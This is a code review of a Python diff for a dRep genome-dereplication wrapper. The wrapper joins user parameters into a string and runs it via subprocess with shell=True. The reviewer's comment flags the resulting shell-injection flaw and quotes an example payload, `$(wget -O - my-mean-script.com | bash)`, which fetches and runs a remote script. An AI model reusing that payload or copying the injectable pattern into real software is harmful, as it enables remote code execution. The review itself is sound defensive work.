lib/dRep/dRepImpl.py

```diff
@@ -0,0 +1,441 @@
+
+        paramGrp_key_l = ['filtering', 'genome_comparison', 'clustering', 'scoring', 'warnings']
+
+        for paramGrp_key in paramGrp_key_l:
+            if paramGrp_key in params:
+                paramGrp_d = params[paramGrp_key]
+                for paramIndiv_key in paramGrp_d:
+                    params[paramIndiv_key] = paramGrp_d[paramIndiv_key]
+                params.pop(paramGrp_key)
+
+
+        #
+
+        dRep_params = ['--debug']
+
+
+        #
+        
+        if _globals.debug and 'processors' in params:
+            dRep_params.extend(['--processors', params.get('processors')])
+        else:
+            dRep_params.extend(['--processors', '8'])
+
+                
+        # extract non-default parameters
+
+        dRep_param_defaults = {
+                'length': 50000,
+                'completeness': 75,
+                'contamination': 25, 
+                'ignoreGenomeQuality': "False", 
+                'MASH_sketch': 1000,
+                'S_algorithm': 'ANImf',
+                'n_PRESET': 'normal',
+                'P_ani': 0.9,
+                'S_ani': 0.99,
+                'SkipMash': "False", 
+                'SkipSecondary': "False",
+                'cov_thresh': 0.1,
+                'coverage_method': 'larger',
+                'clusterAlg': 'average', 
+                'completeness_weight': 1,
+                'contamination_weight': 5,
+                'strain_heterogeneity_weight': 1, 
+                'N50_weight': 0.5,
+                'size_weight': 0,
+                'warn_dist': 0.25, 
+                'warn_sim': 0.98,
+                'warn_aln': 0.25,
+                'checkM_method': 'lineage_wf',
+                }
+
+        params_bool = [key for key in dRep_param_defaults if dRep_param_defaults[key] == 'False']
+
+        for key in dRep_param_defaults:
+            if params.get(key) and params[key] != dRep_param_defaults[key]:
+                dRep_params.append('--' + key)
+                if key not in params_bool:
+                    dRep_params.append(params[key])
+
+        dRep_params = [str(param) for param in dRep_params]
+
+
+
+        #
+        ##
+        ### run dRep
+        ####
+        #####
+
+        if _globals.debug and params.get('skip_dRep'):
+
+            dRep_workDir = os.path.join(_globals.shared_folder, params['dRep_workDir_name'])
+
+            dRep_cmd = ("Skipped running dRep ... "
+                        "but dRep_params are: "
+                        f"`{' '.join(dRep_params)}` and workDir is `{dRep_workDir}`")
+
+        else:
+            dRep_workDir = os.path.join(_globals.run_dir, 'dRep_workDir')
+
+            dRep_cmd = ' '.join(
+                [f'dRep dereplicate {dRep_workDir} --genomes {binsPooled_dir}/*.fasta'] + dRep_params)
+
+            logging.info('Running dRep command `%s`' % dRep_cmd)
+            completed_proc = subprocess.run(dRep_cmd, shell=True, stdout=sys.stdout, stderr=sys.stderr)
```

Comment:
Using shell=True with a big string command like that will allow people to do shell injection. An example would be if I put some code like `$(wget -O - my-mean-script.com | bash)` for one of the dRep parameter values. 

Probably the only reason you need to use shell=True is to evaluate the `*.fasta` wildcard. Can you pass multiple filenames to the --genomes flag? If so, you could get all the .fasta filenames and list them explicitly for that argument.